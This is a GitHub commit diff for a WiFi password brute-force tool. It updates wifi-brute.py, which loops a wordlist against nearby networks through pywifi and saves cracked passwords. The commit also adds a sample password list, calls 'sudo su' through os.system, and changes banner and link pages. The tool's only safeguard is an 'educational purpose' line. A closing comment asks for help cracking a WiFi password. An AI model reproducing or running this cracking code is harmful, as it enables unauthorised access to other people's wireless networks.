Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
Cyber-Dioxide authored Aug 7, 2022
1 parent 6a2cf77 commit 7cc0627
Show file tree
Hide file tree
Showing 5 changed files with 47 additions and 27 deletions.
14 changes: 7 additions & 7 deletions Head.html
Original file line number Diff line number Diff line change
@@ -1,23 +1,23 @@

</!DOCTYPE html>
<html>
<body style="background-color: blue;">
<html style="background-color: #19423f">
<body style="background-color: #19423f;">

<title>
My GitHub
Introduction
</title>
<a style="text-align: center;background-color: rgb(206, 146, 67);font-size: larger;" href="https://chat.whatsapp.com/JgAi8TlpAu4EoYphUs09pH">
<a style="text-align: center;background-color: rgb(25,66,63);font-size: larger;" href="https://chat.whatsapp.com/JgAi8TlpAu4EoYphUs09pH">
Our WhatsAPP Group
<hr>
<a style="text-align: center;background-color: rgb(177, 221, 89);font-size: larger;" href="https://github.com/Cyber-Dioxide">
<a style="text-align: center;background-color: rgb(25,66,63);font-size: larger;" href="https://github.com/Cyber-Dioxide">
My GitHub Profile
</a>
<hr>
<a style="text-align: center;background-color: rgb(179, 132, 233);font-size: larger;" href="https://instagram.com/cyber_dioxide">
<a style="text-align: center;background-color: rgb(25,66,63);font-size: larger;" href="https://instagram.com/cyber_dioxide">
My instagram
</a>
<hr>
<a style="text-align: center;background-color: rgb(107, 226, 210);font-size: larger;" href="https://instagram.com/coding_memz">
<a style="text-align: center;background-color: rgb(25,66,63);font-size: larger;" href="https://instagram.com/coding_memz">
My Coding Channel
</a>
</body>
Expand Down
2 changes: 1 addition & 1 deletion Version.dat
Original file line number Diff line number Diff line change
@@ -1,2 +1,2 @@

v 2.1
v 4.4
5 changes: 3 additions & 2 deletions scripts/banner.py
Original file line number Diff line number Diff line change
Expand Up @@ -33,10 +33,11 @@

def banner():
print(c.ran + logo)
print(c.ran,"\n" + "|"+ Style.BRIGHT + Fore.LIGHTCYAN_EX, "- " * 4, " [+] Follow me on Instagram @cyber_dioxide ", "- " * 4 + c.ran + "|")
print(c.ran,"" + "|"+ Style.BRIGHT + Fore.LIGHTCYAN_EX, "- " * 4, " [+] Follow me on Instagram @cyber_dioxide ", "- " * 4 + c.ran + "|")
print(c.ran, "\n" + "|"+ Style.BRIGHT + Fore.LIGHTYELLOW_EX, "- " * 4, " [+] Follow me on Instagram @coding_memz ", "- " * 4+c.ran + "|")
print(c.ran , "\n"+ "|"+ Style.BRIGHT + Fore.LIGHTRED_EX, "- " * 4, "[+] Github: https://github.com/Cyber-Dioxide ", "- " * 3+c.ran + "|\n")
print(c.ran , "\n"+ "|"+ Style.BRIGHT + Fore.LIGHTRED_EX, "- " * 4, "[+] Github: https://github.com/Cyber-Dioxide/ ", "- " * 3+c.ran + "|")

print(c.ran + '-' * 63)


def banner2():
Expand Down
4 changes: 4 additions & 0 deletions tryMore.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
112223344
password123
adminpanel
gateway12234
49 changes: 32 additions & 17 deletions wifi-brute.py
Original file line number Diff line number Diff line change
@@ -1,4 +1,6 @@
import os
import platform
import sys
try:
import pywifi
except ModuleNotFoundError:
Expand All @@ -9,46 +11,59 @@
from scripts.colors import ran,y,r,g,c

import time
import webbrowser

# webbrowser.open("Head.html")

yes = ["y" , "yes"]
no = ["no" , "n"]

def help():
print(f"\t{r}-> {c}Usage:~ {y}python3 wifi-brute.py <wordlist>\n\t{r}-> {c}python3 wifi-brute.py {y}(it wil use default wordlist")
exit()


if len(sys.argv) < 2:
p_in = "passwords.txt"

elif sys.argv[1] == "--help":
help()

else:
p_in = sys.argv[1]


def rootCHEK():
s = os.popen("whoami").read()
print(s)
if ("root") in s:
print("You are root")
pass
else:
print("Run this tool as root")
exit()
if "aarch64" in platform.machine():
print("Run this tool as root in Termux.")
exit()
if "Linux" in platform.platform():
print("Root your terminal for better performance")
os.system("sudo su")
if "Windows" in platform.platform():
print("Iam developed to work on Windows. Dont worry i'll take care of next!")

time.sleep(3)

rootCHEK()


clear()

sprint(f"\n\n{r} Note: {c}This tool is only made for educational purpose... -_+")
sprint(f"\n{g}Preparing...")
time.sleep(1)
time.sleep(2)
clear()
banner()


p_in = input(f"{y}\nDo you want to use default wordlist? {r}(y/n):").lower()

passlist = ""

if p_in in yes:
passlist = f"passwords.txt"
else:
try:
passlist = input(ran + "\nEnter path for passlist: " + g)
except FileNotFoundError:
print(r+"File Not found!")
exit(0)
passlist = p_in


passwords = [x.strip("\n") for x in open(passlist , "r", encoding="UTF-8" , errors="ignore").readlines()]
Expand Down Expand Up @@ -77,7 +92,7 @@ def main():

if res:
print(ran + "="*20)
print(f"{r}Password found : {c}{str(res)}")
print(f"{r}Password found : {c}{str(res)}\n")

with open("avail_nearby_wifis.txt", "a") as f:
f.write(str(res) + "\n")
Expand All @@ -101,7 +116,7 @@ def test(i ,face,x,key,ts):
continue
else:
with open("already_tried_password" , "a") as f:
f.write(str(wifi_name)+"--"+str(password))
f.write(str(wifi_name)+"--"+str(password)+"\n")
tried.append(str(wifi_name)+"--"+str(password))
print(f"{ran}Trying password {r}{str(password)} {c}{str(n)} / {g}{str(len(key))}")

Expand Down

1 comment on commit 7cc0627

@BJORBY
Copy link

@BJORBY BJORBY commented on 7cc0627 Sep 27, 2022

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Help pasword wifi

Please sign in to comment.